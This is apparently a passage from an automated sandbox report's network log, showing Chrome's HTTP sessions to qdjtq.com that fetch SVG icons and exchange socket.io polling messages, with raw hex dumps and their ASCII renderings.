            2024-09-27 00:29:51 UTC2455INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 31 35 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 31 35 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 70 61 6e 61 6d 61 22 3e 0d 0a 20 20 20 20 3c 67 20 69 64 3d 22 47 72 6f 75 70 22 3e 0d 0a 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 31 2e 35 20 30 2e 33 39 33 34 33 37 4c
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="panama"> <g id="Group"> <path d="M11.5 0.393437L


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            84192.168.2.649806129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:51 UTC360OUTGET /modify/layout/images/54.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:51 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:51 GMT
            Content-Type: image/svg+xml
            Content-Length: 1189
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"4a5-1902494f420"
            2024-09-27 00:29:51 UTC1189INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 37 70 78 22 20 68 65 69 67 68 74 3d 22 31 37 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 37 20 31 37 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 6d 65 6e 75 2d 28 31 29 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 30 2e 38 37 35 32 35 32 20 31 2e 36 31 39 30 34 4c 32 32 2e 31 35 34 31 20 31 2e 36 31 39 30 34 43 32
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="27px" height="17px" viewBox="0 0 27 17" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="menu-(1)"> <path d="M0.875252 1.61904L22.1541 1.61904C2


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            85192.168.2.649809129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:51 UTC597OUTGET /modify/layout/images/57.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:51 UTC315INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:51 GMT
            Content-Type: image/svg+xml
            Content-Length: 10409
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"28a9-1902494f420"
            2024-09-27 00:29:51 UTC10409INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 33 70 78 22 20 68 65 69 67 68 74 3d 22 33 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 33 20 33 30 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 47 72 6f 75 70 20 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 50 6c 61 6e 74 69 6c 6c 61 2d 31 2d 2d 2d 4d 65 6e 75 73 2d 64 65 73 70 6c 65 67 61 64 6f 73 22
            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>Group 30</title> <g id="Plantilla-1---Menus-desplegados"


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            86192.168.2.649810129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:51 UTC360OUTGET /modify/layout/images/50.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:52 UTC315INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:51 GMT
            Content-Type: image/svg+xml
            Content-Length: 25821
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"64dd-1902494f420"
            2024-09-27 00:29:52 UTC16069INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 31 35 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 31 35 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 75 6e 69 74 65 64 2d 73 74 61 74 65 73 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 31 2e 32 37 37 35 20 30 4c 31 2e 37 32 32 35 33 20 30 43 30 2e 37 37 31 31 37 34 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="united-states"> <path d="M21.2775 0L1.72253 0C0.771174
            2024-09-27 00:29:52 UTC9752INData Raw: 37 35 36 4c 30 2e 36 33 37 32 37 38 20 30 2e 35 32 30 38 36 34 4c 30 2e 37 32 31 30 31 32 20 30 2e 37 38 34 31 39 37 43 30 2e 37 33 31 38 38 33 20 30 2e 38 31 38 32 37 20 30 2e 36 39 32 38 34 36 20 30 2e 38 34 36 35 33 31 20 30 2e 36 36 33 36 30 32 20 30 2e 38 32 35 36 39 33 4c 30 2e 34 33 37 38 37 20 30 2e 36 36 35 30 37 33 4c 30 2e 32 31 32 31 33 37 20 30 2e 38 32 35 36 39 33 43 30 2e 31 38 32 38 39 33 20 30 2e 38 34 36 34 38 36 20 30 2e 31 34 33 39 34 36 20 30 2e 38 31 38 33 31 35 20 30 2e 31 35 34 37 32 37 20 30 2e 37 38 34 31 39 37 4c 30 2e 32 33 38 34 36 31 20 30 2e 35 32 30 38 36 34 4c 30 2e 30 31 35 32 34 34 36 20 30 2e 33 35 36 37 35 36 43 2d 30 2e 30 31 33 36 34 30 31 20 30 2e 33 33 35 35 36 20 30 2e 30 30 31 32 32 39 30 31 20 30 2e 32 38 39 39
            Data Ascii: 756L0.637278 0.520864L0.721012 0.784197C0.731883 0.81827 0.692846 0.846531 0.663602 0.825693L0.43787 0.665073L0.212137 0.825693C0.182893 0.846486 0.143946 0.818315 0.154727 0.784197L0.238461 0.520864L0.0152446 0.356756C-0.0136401 0.33556 0.00122901 0.2899


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            87192.168.2.649812129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:52 UTC543OUTGET /socket.io/?EIO=4&transport=websocket&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1
            Host: qdjtq.com
            Connection: Upgrade
            Pragma: no-cache
            Cache-Control: no-cache
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Upgrade: websocket
            Origin: https://qdjtq.com
            Sec-WebSocket-Version: 13
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Sec-WebSocket-Key: pw3FlDQ2U5IYDCTyMVsmsQ==
            Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            2024-09-27 00:29:52 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:52 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:52 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 22{"code":3,"message":"Bad request"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            88192.168.2.649811129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:52 UTC663OUTPOST /socket.io/?EIO=4&transport=polling&t=P8muayj&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 54
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            Content-type: text/plain;charset=UTF-8
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:52 UTC54OUTData Raw: 34 32 31 5b 22 6c 6f 67 69 6e 22 2c 22 75 73 65 72 2d 75 73 65 72 2d 56 43 57 4c 61 6f 44 62 59 73 35 4a 30 4b 30 4b 41 48 74 74 22 2c 5b 22 75 73 65 72 22 5d 5d
            Data Ascii: 421["login","user-user-VCWLaoDbYs5J0K0KAHtt",["user"]]
            2024-09-27 00:29:52 UTC198INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:52 GMT
            Content-Type: text/html
            Content-Length: 2
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:52 UTC2INData Raw: 6f 6b
            Data Ascii: ok


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            89192.168.2.649813129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:52 UTC575OUTGET /socket.io/?EIO=4&transport=polling&t=P8muayi&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:52 UTC216INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:52 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 162
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:52 UTC162INData Raw: 34 32 5b 22 6f 6e 6c 69 6e 65 2d 63 6f 75 6e 74 2d 75 73 65 72 22 2c 38 2c 22 75 73 65 72 2d 75 73 65 72 2d 56 43 57 4c 61 6f 44 62 59 73 35 4a 30 4b 30 4b 41 48 74 74 22 2c 74 72 75 65 5d 1e 34 33 31 5b 7b 22 63 6f 64 65 22 3a 30 2c 22 6d 73 67 22 3a 22 6f 6b 22 2c 22 74 69 6d 65 22 3a 22 46 72 69 20 53 65 70 20 32 37 20 32 30 32 34 20 30 30 3a 32 39 3a 35 31 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 22 7d 5d
            Data Ascii: 42["online-count-user",8,"user-user-VCWLaoDbYs5J0K0KAHtt",true]431[{"code":0,"msg":"ok","time":"Fri Sep 27 2024 00:29:51 GMT+0000 (Coordinated Universal Time)"}]


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            90192.168.2.649814129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:52 UTC377OUTGET /socket.io/?EIO=4&transport=polling&t=P8muaSX HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:53 UTC216INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:53 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 118
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:53 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 33 68 5f 46 6c 39 74 31 6e 32 54 6e 66 58 4e 53 41 48 74 78 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
            Data Ascii: 0{"sid":"3h_Fl9t1n2TnfXNSAHtx","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            91192.168.2.649815129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:52 UTC575OUTGET /socket.io/?EIO=4&transport=polling&t=P8mub9p&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:53 UTC214INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:53 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 1
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:53 UTC1INData Raw: 31
            Data Ascii: 1


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            92192.168.2.649816129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:52 UTC597OUTGET /modify/layout/images/58.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:53 UTC315INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:53 GMT
            Content-Type: image/svg+xml
            Content-Length: 17096
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"42c8-1902494f420"
            2024-09-27 00:29:53 UTC16069INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 33 70 78 22 20 68 65 69 67 68 74 3d 22 33 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 33 20 33 30 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 47 72 6f 75 70 20 31 36 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 69 64 3d 22 70 61 74 68 2d 31 22 20 70 6f 69
            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>Group 16</title> <defs> <polygon id="path-1" poi
            2024-09-27 00:29:53 UTC1027INData Raw: 2e 35 36 33 37 30 35 31 20 32 33 2e 39 38 36 35 30 34 35 2c 31 34 2e 32 36 34 37 38 20 43 32 33 2e 39 31 36 38 33 30 35 2c 31 33 2e 39 36 35 38 35 34 39 20 32 33 2e 36 39 38 30 35 34 2c 31 33 2e 37 32 34 32 30 30 35 20 32 33 2e 34 30 37 37 34 35 34 2c 31 33 2e 36 32 35 34 39 20 4c 31 39 2e 32 38 35 38 32 38 37 2c 31 32 2e 32 32 34 34 35 33 32 20 43 31 39 2e 31 39 32 34 36 35 35 2c 31 32 2e 31 39 32 37 39 31 34 20 31 39 2e 30 39 36 37 37 39 38 2c 31 32 2e 31 37 37 34 32 36 31 20 31 39 2e 30 30 31 35 35 38 36 2c 31 32 2e 31 37 37 34 32 36 31 20 43 31 38 2e 37 36 39 37 37 36 33 2c 31 32 2e 31 37 37 34 32 36 31 20 31 38 2e 35 34 33 35 36 37 39 2c 31 32 2e 32 36 38 32 32 31 31 20 31 38 2e 33 37 34 34 39 32 32 2c 31 32 2e 34 33 37 37 30 35 31 20 43 31 38 2e 31
            Data Ascii: .5637051 23.9865045,14.26478 C23.9168305,13.9658549 23.698054,13.7242005 23.4077454,13.62549 L19.2858287,12.2244532 C19.1924655,12.1927914 19.0967798,12.1774261 19.0015586,12.1774261 C18.7697763,12.1774261 18.5435679,12.2682211 18.3744922,12.4377051 C18.1


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            93192.168.2.649818129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:52 UTC360OUTGET /modify/layout/images/55.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:53 UTC315INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:52 GMT
            Content-Type: image/svg+xml
            Content-Length: 14308
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"37e4-1902494f420"
            2024-09-27 00:29:53 UTC14308INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 31 39 70 78 22 20 68 65 69 67 68 74 3d 22 33 37 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 31 39 20 33 37 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 64 65 66 73 3e 0d 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 78 31 3d 22 30 2e 34 38 34 32 38 38 38 37 22 20 79 31 3d 22 31 2e 30 31 34 38 38 38 33 22 20 78 32 3d 22 30 2e
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="219px" height="37px" viewBox="0 0 219 37" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <defs> <linearGradient x1="0.48428887" y1="1.0148883" x2="0.


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            94192.168.2.649819129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:52 UTC597OUTGET /modify/layout/images/59.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:53 UTC314INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:52 GMT
            Content-Type: image/svg+xml
            Content-Length: 7554
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"1d82-1902494f420"
            2024-09-27 00:29:53 UTC7554INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 33 70 78 22 20 68 65 69 67 68 74 3d 22 33 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 33 20 33 30 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 47 72 6f 75 70 20 32 38 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 50 6c 61 6e 74 69 6c 6c 61 2d 31 2d 2d 2d 4d 65 6e 75 73 2d 64 65 73 70 6c 65 67 61 64 6f 73 22
            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>Group 28</title> <g id="Plantilla-1---Menus-desplegados"


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            95192.168.2.649817129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:52 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8muanP&sid=3E0SqkwJomtmg_wKAHtv HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
